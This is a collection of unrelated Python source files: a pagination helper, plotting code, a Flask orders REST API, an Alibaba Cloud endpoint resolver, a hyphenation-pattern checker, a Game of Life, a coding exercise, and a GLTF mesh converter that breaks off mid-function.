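    new_id = db.Customers.insert({'name': 'mogaka', 'age': 30})
    db.commit()  # MySQLdb opens an implicit transaction; commit persists the insert
    # cursor-style pagination via the Paginator defined below
    pager = Paginator(url='http://api.example.com/customers?page=1', page_number=1, page_size=25)
    page = db.Customers.fetch_paginated(pager)  # {'results': [...], 'pagination': {...}}
    return rows, new_id, page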
class Paginator:
def __init__(self,max_page_size=None,url=None,page_number=None,page_size=None,last_seen=None,last_seen_field_name=None,direction=None):
self.page_number = int(page_number) if page_number else 1
self.max_page_size = max_page_size if max_page_size else 1000
if page_size:
if int(page_size) > self.max_page_size:
self.page_size = self.max_page_size
else:
self.page_size = int(page_size)
else:
self.page_size = 25
self.last_seen_field_name = last_seen_field_name if last_seen_field_name else 'id'
self.direction = direction
self.last_seen = last_seen
self.url = url
self._where_clause = ''
self._params = []
def get_order_by(self):
order_by = []
if self.page_number == 1 or self.direction == 'next':
order_by = ["-{}".format(self.last_seen_field_name)] #order descending
elif self.direction == 'prev':
order_by = ["{}".format(self.last_seen_field_name)] #order ascending
return order_by
def get_filter_data(self):
filter_data = None
if self.page_number == 1:
filter_data = {}
elif self.direction == 'prev':
filter_data = {
"{}".format(self.last_seen_field_name):{"$gt":"%s"%(self.last_seen)}
}
elif self.direction == 'next':
filter_data = {
"{}".format(self.last_seen_field_name):{"$lt":"%s"%(self.last_seen)}
}
return filter_data
def get_next_link(self,results_list):
page = self.page_number + 1
url = self.url
if len(results_list) < self.page_size:
return None
if self.direction == 'prev' and page != 2:
last_seen_dict = results_list[:-1][0]
else:
last_seen_dict = results_list[-1:][0]
url=self.replace_query_param(url, 'page', page)
url=self.replace_query_param(url, 'dir', 'next')
url=self.replace_query_param(url, 'last_seen', last_seen_dict.get(self.last_seen_field_name))
return url
def get_previous_link(self,results_list):
page=self.page_number - 1
url=self.url
if page == 0:
return None
elif len(results_list) == 0:
#return home link
url=self.remove_query_param(url, 'page')
url=self.remove_query_param(url, 'dir')
url=self.remove_query_param(url, 'last_seen')
return url
if self.direction == 'next' :
last_seen_dict = results_list[:-1][0]
else:
last_seen_dict = results_list[-1:][0]
#last_seen_dict = results_list[-1:][0]
url=self.replace_query_param(url, 'page', page)
url=self.replace_query_param(url, 'dir', 'prev')
url=self.replace_query_param(url, 'last_seen', last_seen_dict.get(self.last_seen_field_name))
return url
def replace_query_param(self,url, key, val):
"""
Given a URL and a key/val pair, set or replace an item in the query
parameters of the URL, and return the new URL.
"""
(scheme, netloc, path, query, fragment) = parse.urlsplit(url)
query_dict = parse.parse_qs(query, keep_blank_values=True)
query_dict[str(key)] = [val]
query = parse.urlencode(sorted(list(query_dict.items())), doseq=True)
return parse.urlunsplit((scheme, netloc, path, query, fragment))
def remove_query_param(self,url, key):
"""
Given a URL and a key/val pair, remove an item in the query
parameters of the URL, and return the new URL.
"""
(scheme, netloc, path, query, fragment) = parse.urlsplit(url)
query_dict = parse.parse_qs(query, keep_blank_values=True)
query_dict.pop(key, None)
query = parse.urlencode(sorted(list(query_dict.items())), doseq=True)
return parse.urlunsplit((scheme, netloc, path, query, fragment))
def get_pagination_data(self,results_list):
return {'page_size':self.page_size,
'next_url': self.get_next_link(results_list),
'previous_url': self.get_previous_link(results_list)
} | 2.328125 | 2 |
hidrocomp/graphics/genpareto.py | clebsonpy/HydroComp | 4 | 31108 | import scipy.stats as stat
import pandas as pd
import plotly.graph_objs as go
from hidrocomp.graphics.distribution_build import DistributionBuild
class GenPareto(DistributionBuild):
def __init__(self, title, shape, location, scale):
super().__init__(title, shape, location, scale)
def cumulative(self):
datas = self._data('cumulative')
data = [go.Scatter(x=datas['peaks'], y=datas['Cumulative'],
name=self.title, line=dict(color='rgb(128, 128, 128)',
width=2))]
bandxaxis = go.layout.XAxis(title="Vazão(m³/s)")
bandyaxis = go.layout.YAxis(title="Probabilidade")
layout = dict(title="GP - Acumulada: %s" % self.title,
showlegend=True,
width=945, height=827,
xaxis=bandxaxis,
yaxis=bandyaxis,
                      font=dict(family='Times New Roman', size=28, color='rgb(0,0,0)')
)
fig = dict(data=data, layout=layout)
return fig, data
def density(self):
datas = self._data('density')
data = [go.Scatter(x=datas['peaks'], y=datas['Density'],
name=self.title, line=dict(color='rgb(128, 128, 128)',
width=2))]
bandxaxis = go.layout.XAxis(title="Vazão(m³/s)")
bandyaxis = go.layout.YAxis(title="")
layout = dict(title="GP - Densidade: %s" % self.title,
showlegend=True,
width=945, height=827,
xaxis=bandxaxis,
yaxis=bandyaxis,
                      font=dict(family='Times New Roman', size=28, color='rgb(0,0,0)')
)
fig = dict(data=data, layout=layout)
return fig, data
def _data_density(self):
cumulative = self._data_cumulative()
density = stat.genpareto.pdf(cumulative['peaks'].values, self.shape,
loc=self.location, scale=self.scale)
dic = {'peaks': cumulative['peaks'].values, 'Density': density}
return pd.DataFrame(dic)
def _data_cumulative(self):
probability = list()
for i in range(1, 1000):
probability.append(i/1000)
quantiles = stat.genpareto.ppf(probability, self.shape,
loc=self.location,
scale=self.scale)
dic = {'peaks': quantiles, 'Cumulative': probability}
return pd.DataFrame(dic)
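# --- Illustrative sketch: plotting a fitted distribution. The parameter values
# are made-up fit results (in practice they would come from
# scipy.stats.genpareto.fit on peaks-over-threshold data), and it assumes
# DistributionBuild dispatches _data('cumulative') to _data_cumulative as the
# methods above imply. Never called by this module.
def _example_genpareto_plot():
    dist = GenPareto('Peaks over threshold', shape=0.1, location=0.0, scale=50.0)
    fig, data = dist.cumulative()
    return fig  # e.g. render with plotly.offline.plot(fig)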
| 1.835938 | 2 |
preacher/compilation/yaml/tag/argument.py | ymoch/preacher | 3 | 31236 | <reponame>ymoch/preacher
from yaml import Node
from yamlen import Tag, TagContext
from preacher.compilation.argument import Argument
class ArgumentTag(Tag):
def construct(self, node: Node, context: TagContext) -> object:
key = context.constructor.construct_scalar(node) # type: ignore
return Argument(key)
| 0.933594 | 1 |
orders/api.py | terryjbates/restbucks | 0 | 31364 | <reponame>terryjbates/restbucks
import os
from datetime import datetime
from dateutil import parser as datetime_parser
from dateutil.tz import tzutc
from flask import Flask, url_for, jsonify, request
from flask_sqlalchemy import SQLAlchemy  # the flask.ext.* namespace was removed in Flask 1.0
from utils import split_url
basedir = os.path.abspath(os.path.dirname(__file__))
db_path = os.path.join(basedir, '../data.sqlite')
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + db_path
db = SQLAlchemy(app)
class ValidationError(ValueError):
pass
@app.errorhandler(ValidationError)
def bad_request(e):
response = jsonify({'status': 400, 'error': 'bad request',
'message': e.args[0]})
response.status_code = 400
return response
@app.errorhandler(404)
def not_found(e):
response = jsonify({'status': 404, 'error': 'not found',
'message': 'invalid resource URI'})
response.status_code = 404
return response
@app.errorhandler(405)
def method_not_supported(e):
response = jsonify({'status': 405, 'error': 'method not supported',
'message': 'the method is not supported'})
response.status_code = 405
return response
@app.errorhandler(500)
def internal_server_error(e):
response = jsonify({'status': 500, 'error': 'internal server error',
'message': e.args[0]})
response.status_code = 500
return response
class Customer(db.Model):
__tablename__ = 'customers'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), index=True)
orders = db.relationship('Order', backref='customer', lazy='dynamic')
def get_url(self):
return url_for('get_customer', id=self.id, _external=True)
def export_data(self):
return {
'self_url': self.get_url(),
'name': self.name,
'orders_url': url_for('get_customer_orders', id=self.id,
_external=True)
}
def import_data(self, data):
try:
self.name = data['name']
except KeyError as e:
raise ValidationError('Invalid customer: missing ' + e.args[0])
return self
class Product(db.Model):
__tablename__ = 'products'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), index=True)
items = db.relationship('Item', backref='product', lazy='dynamic')
def get_url(self):
return url_for('get_product', id=self.id, _external=True)
def export_data(self):
return {
'self_url': self.get_url(),
'name': self.name
}
def import_data(self, data):
try:
self.name = data['name']
except KeyError as e:
raise ValidationError('Invalid product: missing ' + e.args[0])
return self
class Order(db.Model):
__tablename__ = 'orders'
id = db.Column(db.Integer, primary_key=True)
customer_id = db.Column(db.Integer, db.ForeignKey('customers.id'),
index=True)
date = db.Column(db.DateTime, default=datetime.now)
items = db.relationship('Item', backref='order', lazy='dynamic',
cascade='all, delete-orphan')
def get_url(self):
return url_for('get_order', id=self.id, _external=True)
def export_data(self):
return {
'self_url': self.get_url(),
'customer_url': self.customer.get_url(),
'date': self.date.isoformat() + 'Z',
'items_url': url_for('get_order_items', id=self.id,
_external=True)
}
def import_data(self, data):
try:
self.date = datetime_parser.parse(data['date']).astimezone(
tzutc()).replace(tzinfo=None)
except KeyError as e:
raise ValidationError('Invalid order: missing ' + e.args[0])
return self
class Item(db.Model):
__tablename__ = 'items'
id = db.Column(db.Integer, primary_key=True)
order_id = db.Column(db.Integer, db.ForeignKey('orders.id'), index=True)
product_id = db.Column(db.Integer, db.ForeignKey('products.id'),
index=True)
quantity = db.Column(db.Integer)
def get_url(self):
return url_for('get_item', id=self.id, _external=True)
def export_data(self):
return {
'self_url': self.get_url(),
'order_url': self.order.get_url(),
'product_url': self.product.get_url(),
'quantity': self.quantity
}
def import_data(self, data):
try:
endpoint, args = split_url(data['product_url'])
self.quantity = int(data['quantity'])
except KeyError as e:
raise ValidationError('Invalid order: missing ' + e.args[0])
        if endpoint != 'get_product' or 'id' not in args:
raise ValidationError('Invalid product URL: ' +
data['product_url'])
self.product = Product.query.get(args['id'])
if self.product is None:
raise ValidationError('Invalid product URL: ' +
data['product_url'])
return self
@app.route('/customers/', methods=['GET'])
def get_customers():
return jsonify({'customers': [customer.get_url() for customer in
Customer.query.all()]})
@app.route('/customers/<int:id>', methods=['GET'])
def get_customer(id):
return jsonify(Customer.query.get_or_404(id).export_data())
@app.route('/customers/', methods=['POST'])
def new_customer():
customer = Customer()
customer.import_data(request.json)
db.session.add(customer)
db.session.commit()
return jsonify({}), 201, {'Location': customer.get_url()}
@app.route('/customers/<int:id>', methods=['PUT'])
def edit_customer(id):
customer = Customer.query.get_or_404(id)
customer.import_data(request.json)
db.session.add(customer)
db.session.commit()
return jsonify({})
@app.route('/products/', methods=['GET'])
def get_products():
return jsonify({'products': [product.get_url() for product in
Product.query.all()]})
@app.route('/products/<int:id>', methods=['GET'])
def get_product(id):
return jsonify(Product.query.get_or_404(id).export_data())
@app.route('/products/', methods=['POST'])
def new_product():
product = Product()
product.import_data(request.json)
db.session.add(product)
db.session.commit()
return jsonify({}), 201, {'Location': product.get_url()}
@app.route('/products/<int:id>', methods=['PUT'])
def edit_product(id):
product = Product.query.get_or_404(id)
product.import_data(request.json)
db.session.add(product)
db.session.commit()
return jsonify({})
@app.route('/orders/', methods=['GET'])
def get_orders():
return jsonify({'orders': [order.get_url() for order in Order.query.all()]})
@app.route('/customers/<int:id>/orders/', methods=['GET'])
def get_customer_orders(id):
customer = Customer.query.get_or_404(id)
return jsonify({'orders': [order.get_url() for order in
customer.orders.all()]})
@app.route('/orders/<int:id>', methods=['GET'])
def get_order(id):
return jsonify(Order.query.get_or_404(id).export_data())
@app.route('/customers/<int:id>/orders/', methods=['POST'])
def new_customer_order(id):
customer = Customer.query.get_or_404(id)
order = Order(customer=customer)
order.import_data(request.json)
db.session.add(order)
db.session.commit()
return jsonify({}), 201, {'Location': order.get_url()}
@app.route('/orders/<int:id>', methods=['PUT'])
def edit_order(id):
order = Order.query.get_or_404(id)
order.import_data(request.json)
db.session.add(order)
db.session.commit()
return jsonify({})
@app.route('/orders/<int:id>', methods=['DELETE'])
def delete_order(id):
order = Order.query.get_or_404(id)
db.session.delete(order)
db.session.commit()
return jsonify({})
@app.route('/orders/<int:id>/items/', methods=['GET'])
def get_order_items(id):
order = Order.query.get_or_404(id)
return jsonify({'items': [item.get_url() for item in order.items.all()]})
@app.route('/items/<int:id>', methods=['GET'])
def get_item(id):
return jsonify(Item.query.get_or_404(id).export_data())
@app.route('/orders/<int:id>/items/', methods=['POST'])
def new_order_item(id):
order = Order.query.get_or_404(id)
item = Item(order=order)
item.import_data(request.json)
db.session.add(item)
db.session.commit()
return jsonify({}), 201, {'Location': item.get_url()}
@app.route('/items/<int:id>', methods=['PUT'])
def edit_item(id):
item = Item.query.get_or_404(id)
item.import_data(request.json)
db.session.add(item)
db.session.commit()
return jsonify({})
@app.route('/items/<int:id>', methods=['DELETE'])
def delete_item(id):
item = Item.query.get_or_404(id)
db.session.delete(item)
db.session.commit()
return jsonify({})
if __name__ == '__main__':
db.create_all()
app.run(debug=True)
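# --- Illustrative client session (assumes the server above is running on
# localhost:5000 and that the `requests` library is available; it is not a
# dependency of this module, hence the example stays commented out):
#
#   import requests
#   base = 'http://localhost:5000'
#   r = requests.post(base + '/customers/', json={'name': 'alice'})
#   customer_url = r.headers['Location']            # 201 Created
#   r = requests.post(customer_url + '/orders/',
#                     json={'date': '2016-01-01T00:00:00Z'})
#   order_url = r.headers['Location']
#   requests.get(order_url).json()                  # exported order data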
| 1.484375 | 1 |
alibabacloud/endpoint/default_endpoint_resolver.py | wallisyan/alibabacloud-python-sdk-v2 | 0 | 31492 | <reponame>wallisyan/alibabacloud-python-sdk-v2<gh_stars>0
# Copyright 2018 Alibaba Cloud Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -*- coding: utf-8 -*-
from alibabacloud.endpoint import EndpointResolver
from alibabacloud.endpoint.chained_endpoint_resolver import ChainedEndpointResolver
from alibabacloud.endpoint.local_config_global_endpoint_resolver \
import LocalConfigGlobalEndpointResolver
from alibabacloud.endpoint.local_config_regional_endpoint_resolver \
import LocalConfigRegionalEndpointResolver
from alibabacloud.endpoint.location_service_endpoint_resolver \
import LocationServiceEndpointResolver
from alibabacloud.endpoint.user_customized_endpoint_resolver import UserCustomizedEndpointResolver
class DefaultEndpointResolver(EndpointResolver):
"""
    `Alibaba Cloud Python` endpoint resolver chain
.. note::
Deprecated use for add_endpoint and modify_endpoint
Not recommended
"""
predefined_endpoint_resolver = UserCustomizedEndpointResolver()
def __init__(self, config, credentials_provider, user_config=None):
self._user_customized_endpoint_resolver = UserCustomizedEndpointResolver()
endpoint_resolvers = [
self.predefined_endpoint_resolver,
self._user_customized_endpoint_resolver,
LocalConfigRegionalEndpointResolver(user_config),
LocalConfigGlobalEndpointResolver(user_config),
LocationServiceEndpointResolver(config, credentials_provider),
]
self._resolver = ChainedEndpointResolver(endpoint_resolvers)
def resolve(self, request):
return self._resolver.resolve(request)
def put_endpoint_entry(self, region_id, product_code, endpoint):
self._user_customized_endpoint_resolver.put_endpoint_entry(region_id, product_code,
endpoint)
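# --- Illustrative use of the user-customized layer (assumes `config` and
# `credentials_provider` come from the SDK's client setup; the endpoint value
# is made up):
#
#   resolver = DefaultEndpointResolver(config, credentials_provider)
#   resolver.put_endpoint_entry('cn-hangzhou', 'Ecs', 'ecs.cn-hangzhou.aliyuncs.com')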
| 1.195313 | 1 |
vpc_hyp2/ansible/roles/vm_create/files/variables.py | dhanraj-vedanth/IaaS_VPC_CDN | 0 | 31620 | <filename>vpc_hyp2/ansible/roles/vm_create/files/variables.py
dom_list = ['an_h1']
| 0.229492 | 0 |
scripts/checkPatterns.py | bbloomf/hyphen-la | 18 | 31748 | <filename>scripts/checkPatterns.py<gh_stars>10-100
#!/usr/bin/env python3
"""
Hyphenation file checker
Copyright (C) 2016 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import argparse
import sys
import re
parser = argparse.ArgumentParser(
description='Tiny script to check hyphenation patterns (against duplicated, invalid, etc.).',formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('path',
help='Path to a pattern file',
action='store', type = argparse.FileType('r'))
args = parser.parse_args()
seenPatterns = {}
line = 0
nbErrors = 0
for pat in args.path:
line += 1
pat = pat.strip('\n')
    if re.search(r'\s', pat):
print(' line %d: pattern \'%s\' contains space' % (line, pat), file=sys.stderr)
nbErrors += 1
reducedPat = re.sub(r'\d', '', pat)
if reducedPat in seenPatterns:
print(' line %d: pattern \'%s\' duplicate with pattern \'%s\' line %d' % (line, pat, seenPatterns[reducedPat][1], seenPatterns[reducedPat][0]), file=sys.stderr)
nbErrors += 1
else:
seenPatterns[reducedPat] = (line, pat)
if nbErrors == 0:
print('No error found')
sys.exit(0)
else:
sys.exit(1)
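# --- Worked example of the duplicate check above (illustrative):
#   >>> re.sub(r'\d', '', 'ab1c') == re.sub(r'\d', '', 'a2bc')
#   True
# i.e. a pattern file containing both 'ab1c' and 'a2bc' is flagged as a
# duplicate pair, because hyphenation levels (the digits) are ignored when
# comparing patterns.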
| 1.84375 | 2 |
gameOfLife.py | andrewKv/pythonGraphicsPrograms | 0 | 31876 | <filename>gameOfLife.py
from Graphics import *
import time  # runSimulation's frame delay relies on time.sleep
CELL_SIZE = 20
ROWS, COLUMNS = 40, 40
class Cell:
def __init__(self, pos):
self.pos = pos
self.alive = False
self.flipNextGen = False
def switch(self):
self.alive = not self.alive
def draw(self, win):
r = Rectangle(Point(self.pos[0], self.pos[1]), Point(self.pos[0] + CELL_SIZE, self.pos[1] + CELL_SIZE))
if self.alive:
r.setFill("black")
else:
r.setFill("white")
r.draw(win)
def showEmptyGrid():
win = GraphWin("Game of Life", 500, 500)
cellGrid = []
for y in range(0, COLUMNS * CELL_SIZE, CELL_SIZE):
for x in range(0, ROWS * CELL_SIZE, CELL_SIZE):
c = Cell([x, y])
cellGrid.append(c)
c.draw(win)
return win, cellGrid
def clickToGrid(pos):
def myRound(x, base):
return int(base * round(float(x) / base))
return myRound(pos.getX(), CELL_SIZE), myRound(pos.getY(), CELL_SIZE)
def inputToGrid(win, cGrid):
placing = True
while placing:
mPos = win.getMouse()
xPos, yPos = clickToGrid(mPos)
for c in cGrid:
if c.pos == [xPos,yPos]:
c.switch()
c.draw(win)
placing = win.checkKey() != "space"
return cGrid
def getNeighbs(c, cGrid):
neighbs = 0
cPlace = cGrid.index(c)
    x = c.pos[0] // CELL_SIZE  # integer grid column
    y = c.pos[1] // CELL_SIZE  # integer grid row
squarePerRow = COLUMNS
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Ugly, try-catch?~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
if x > 0: # Left
if cGrid[cPlace - 1].alive:
neighbs += 1
if y > 0: # Top Left
if cGrid[cPlace - (squarePerRow + 1)].alive:
neighbs += 1
if y < ROWS - 1: # Bottom Left
if cGrid[cPlace + (squarePerRow - 1)].alive:
neighbs += 1
if cGrid[cPlace - squarePerRow].alive: # Top
neighbs += 1
if x < COLUMNS - 1: # Right
if cGrid[cPlace + 1].alive:
neighbs += 1
if y > 0: # Top Right
if cGrid[cPlace - (squarePerRow - 1)].alive:
neighbs += 1
if y < ROWS - 1: # Bottom Right
if cGrid[cPlace + (squarePerRow + 1)].alive:
neighbs += 1
if cGrid[cPlace + squarePerRow].alive: # Bottom
neighbs += 1
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
return neighbs
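# --- Alternative sketch for the direction-by-direction bounds checks above:
# iterate over the eight neighbour offsets instead. Assumes the square grid
# implied by ROWS == COLUMNS; not wired into the simulation, which still
# calls getNeighbs.
def getNeighbsCompact(c, cGrid):
    x, y = c.pos[0] // CELL_SIZE, c.pos[1] // CELL_SIZE
    count = 0
    for dx in (-1, 0, 1):
        for dy in (-1, 0, 1):
            if dx == 0 and dy == 0:
                continue  # skip the cell itself
            nx, ny = x + dx, y + dy
            if 0 <= nx < COLUMNS and 0 <= ny < ROWS:
                if cGrid[ny * COLUMNS + nx].alive:
                    count += 1
    return count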
def runSimulation(win, cGrid):
    while win.checkMouse() is None:
for c in cGrid: #Once through determines changes
nCount = getNeighbs(c, cGrid)
if c.alive:
if nCount < 2 or nCount > 3:
c.flipNextGen = True # Death conditions
# Else lives on
elif nCount == 3: # Birth condition
c.flipNextGen = True
time.sleep(0.05)
for c in cGrid: #Second time activates changes
if c.flipNextGen:
c.switch()
c.flipNextGen = False
c.draw(win)
def main():
# Space to stop clicking inputs
# Click anywhere to end simulation
win, grid = showEmptyGrid()
grid = inputToGrid(win, grid)
runSimulation(win, grid)
main()
| 2.640625 | 3 |
lv1/hash_marathon.py | mrbartrns/programmers-algorithm | 0 | 32004 | <reponame>mrbartrns/programmers-algorithm<filename>lv1/hash_marathon.py
def solution(participant, completion):
answer = ''
    # sorting both lists first saves time
participant.sort() # [a, a, b]
completion.sort() # [a, b]
print(participant)
print(completion)
for i in range(len(completion)):
if participant[i] != completion[i]:
answer = participant[i]
break
else:
answer = participant[len(participant) - 1]
return answer
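# --- Alternative sketch using a hash (collections.Counter) instead of sorting;
# O(n) rather than O(n log n). Not what solution() above uses.
def solution_counter(participant, completion):
    from collections import Counter
    diff = Counter(participant) - Counter(completion)  # drops zero counts
    return next(iter(diff))  # exactly one runner remains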
part = ['marina', 'josipa', 'nikola', 'vinko', 'filipa']
comp = ['josipa', 'filipa', 'marina', 'nikola']
print(solution(part, comp)) | 2.296875 | 2 |
python/DeepSeaScene/Convert/GLTFModel.py | akb825/DeepSea | 5 | 32132 | # Copyright 2020 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import base64
import json
import os
import struct
from .ModelNodeConvert import ModelNodeVertexStream, ModelNodeGeometryData, addModelType
from .SceneResourcesConvert import modelVertexAttribEnum
class Object:
pass
gltfVertexAttribEnum = {
'POSITION': modelVertexAttribEnum['Position'],
'NORMAL': modelVertexAttribEnum['Normal'],
'TANGENT': modelVertexAttribEnum['Tangent'],
'TEXCOORD_0': modelVertexAttribEnum['TexCoord0'],
	'TEXCOORD_1': modelVertexAttribEnum['TexCoord1'],
	'TEXCOORD_2': modelVertexAttribEnum['TexCoord2'],
	'TEXCOORD_3': modelVertexAttribEnum['TexCoord3'],
	'TEXCOORD_4': modelVertexAttribEnum['TexCoord4'],
	'TEXCOORD_5': modelVertexAttribEnum['TexCoord5'],
	'TEXCOORD_6': modelVertexAttribEnum['TexCoord6'],
	'TEXCOORD_7': modelVertexAttribEnum['TexCoord7'],
'COLOR_0': modelVertexAttribEnum['Color0'],
'COLOR_1': modelVertexAttribEnum['Color1'],
'JOINTS_0': modelVertexAttribEnum['BlendIndices'],
'WEIGHTS_0': modelVertexAttribEnum['BlendWeights'],
}
gltfTypeMap = {
('SCALAR', 5120): ('X8', 'Int'),
('SCALAR', 5121): ('X8', 'UInt'),
('SCALAR', 5122): ('X16', 'Int'),
('SCALAR', 5123): ('X16', 'UInt'),
('SCALAR', 5125): ('X32', 'UInt'),
('SCALAR', 5126): ('X32', 'Float'),
('VEC2', 5120): ('X8Y8', 'Int'),
('VEC2', 5121): ('X8Y8', 'UInt'),
('VEC2', 5122): ('X16Y16', 'Int'),
('VEC2', 5123): ('X16Y16', 'UInt'),
('VEC2', 5126): ('X32Y32', 'Float'),
('VEC3', 5120): ('X8Y8Z8', 'Int'),
('VEC3', 5121): ('X8Y8Z8', 'UInt'),
('VEC3', 5122): ('X16Y16Z16', 'Int'),
('VEC3', 5123): ('X16Y16Z16', 'UInt'),
('VEC3', 5126): ('X32Y32Z32', 'Float'),
('VEC4', 5120): ('X8Y8Z8W8', 'Int'),
('VEC4', 5121): ('X8Y8Z8W8', 'UInt'),
('VEC4', 5122): ('X16Y16Z16W16', 'Int'),
('VEC4', 5123): ('X16Y16Z16W16', 'UInt'),
('VEC4', 5126): ('X32Y32Z32W32', 'Float')
}
gltfPrimitiveTypeMap = ['PointList', 'LineList', 'LineStrip', 'LineStrip', 'TriangleList',
'TriangleStrip', 'TriangleFan']
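# --- Minimal illustration of the JSON shape convertGLTFModel (below) consumes;
# only the keys its parsing steps read for buffers, buffer views, accessors and
# meshes are shown, and all values are made up (a real file typically also
# carries indices and mode on each primitive):
#
#   {
#     "buffers":     [{"uri": "mesh.bin", "byteLength": 1024}],
#     "bufferViews": [{"buffer": 0, "byteOffset": 0, "byteLength": 1024}],
#     "accessors":   [{"bufferView": 0, "type": "VEC3", "componentType": 5126,
#                      "count": 24}],
#     "meshes":      [{"name": "cube",
#                      "primitives": [{"attributes": {"POSITION": 0}}]}]
#   }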
def convertGLTFModel(convertContext, path):
"""
	Converts a GLTF model for use with ModelNodeConvert.
If the "name" element is provided for a mesh, it will be used for the name of the model
geometry. Otherwise, the name will be "mesh#", where # is the index of the mesh. If multiple
sets of primitives are used, the index will be appended to the name, separated with '.'.
Limitations:
- Only meshes and dependent data (accessors, buffer views, and buffers) are extracted. All other
parts of the scene are ignored, including transforms.
- Morph targets aren't supported.
- Materials aren't read, and are instead provided in the DeepSea scene configuration.
- Buffer data may either be embedded or a file path relative to the main model file. General
URIs are not supported.
"""
with open(path) as f:
try:
data = json.load(f)
except:
raise Exception('Invalid GLTF file "' + path + '".')
parentDir = os.path.dirname(path)
try:
# Read the buffers.
buffers = []
bufferInfos = data['buffers']
dataPrefix = 'data:application/octet-stream;base64,'
try:
for bufferInfo in bufferInfos:
uri = bufferInfo['uri']
if uri.startswith(dataPrefix):
try:
buffers.append(base64.b64decode(uri[len(dataPrefix):]))
except:
raise Exception('Invalid buffer data for GLTF file "' + path + '".')
else:
with open(os.path.join(parentDir, uri), 'rb') as f:
buffers.append(f.read())
except (TypeError, ValueError):
raise Exception('Buffers must be an array of objects for GLTF file "' + path + '".')
except KeyError as e:
raise Exception('Buffer doesn\'t contain element "' + str(e) +
'" for GLTF file "' + path + '".')
# Read the buffer views.
bufferViews = []
bufferViewInfos = data['bufferViews']
try:
for bufferViewInfo in bufferViewInfos:
bufferView = Object()
try:
bufferData = buffers[bufferViewInfo['buffer']]
except (IndexError, TypeError):
raise Exception('Invalid buffer index for GLTF file "' + path + '".')
offset = bufferViewInfo['byteOffset']
length = bufferViewInfo['byteLength']
try:
bufferView.buffer = bufferData[offset:offset + length]
except (IndexError, TypeError):
raise Exception('Invalid buffer view range for GLTF file "' + path + '".')
bufferViews.append(bufferView)
except (TypeError, ValueError):
raise Exception(
'Buffer views must be an array of objects for GLTF file "' + path + '".')
except KeyError as e:
raise Exception('Buffer view doesn\'t contain element "' + str(e) +
'" for GLTF file "' + path + '".')
# Read the accessors.
accessors = []
accessorInfos = data['accessors']
try:
for accessorInfo in accessorInfos:
accessor = Object()
try:
accessor.bufferView = bufferViews[accessorInfo['bufferView']]
except (IndexError, TypeError):
raise Exception('Invalid buffer view index for GLTF file "' + path + '".')
gltfType = accessorInfo['type']
componentType = accessorInfo['componentType']
try:
accessorType, decorator = gltfTypeMap[(gltfType, componentType)]
except (KeyError, TypeError):
raise Exception('Invalid accessor type (' + str(gltfType) + ', ' +
str(componentType) + ') for GLTF file "' + path + '".')
accessor.type = accessorType
accessor.decorator = decorator
accessor.count = accessorInfo['count']
accessors.append(accessor)
except (TypeError, ValueError):
raise Exception('Accessors must be an array of objects for GLTF file "' + path + '".')
except KeyError as e:
raise Exception('Accessor doesn\'t contain element "' + str(e) +
'" for GLTF file "' + path + '".')
# Read the meshes.
meshes = []
meshInfos = data['meshes']
try:
meshIndex = 0
for meshInfo in meshInfos:
meshName = meshInfo.get('name', 'mesh' + str(meshIndex))
primitiveInfos = meshInfo['primitives']
try:
primitiveIndex = 0
for primitiveInfo in primitiveInfos:
mesh = Object()
mesh.attributes = []
mesh.name = meshName
if len(primitiveInfos) > 1:
mesh.name += '.' + str(primitiveIndex)
primitiveIndex += 1
try:
for attrib, index in primitiveInfo['attributes'].items():
if attrib not in gltfVertexAttribEnum:
raise Exception('Unsupported attribute "' + str(attrib) +
'" for GLTF file "' + path + '".')
try:
mesh.attributes.append((gltfVertexAttribEnum[attrib],
accessors[index]))
except (IndexError, TypeError):
raise Exception('Invalid accessor index for GLTF file "' +
path + '".')
except (TypeError, ValueError):
raise Exception(
'Mesh primitives attributes must be an object containing attribute '
'mappings for GLTF file "' + path + '".')
if 'indices' in primitiveInfo:
try:
mesh.indices = accessors[primitiveInfo['indices']]
except (IndexError, TypeError):
raise Exception(
'Invalid accessor index for GLTF file "' + path + '".')
else:
mesh.indices = None
mode = primitiveInfo.get('mode', 4)
try:
mesh.primitiveType = gltfPrimitiveTypeMap[mode]
except (IndexError, TypeError):
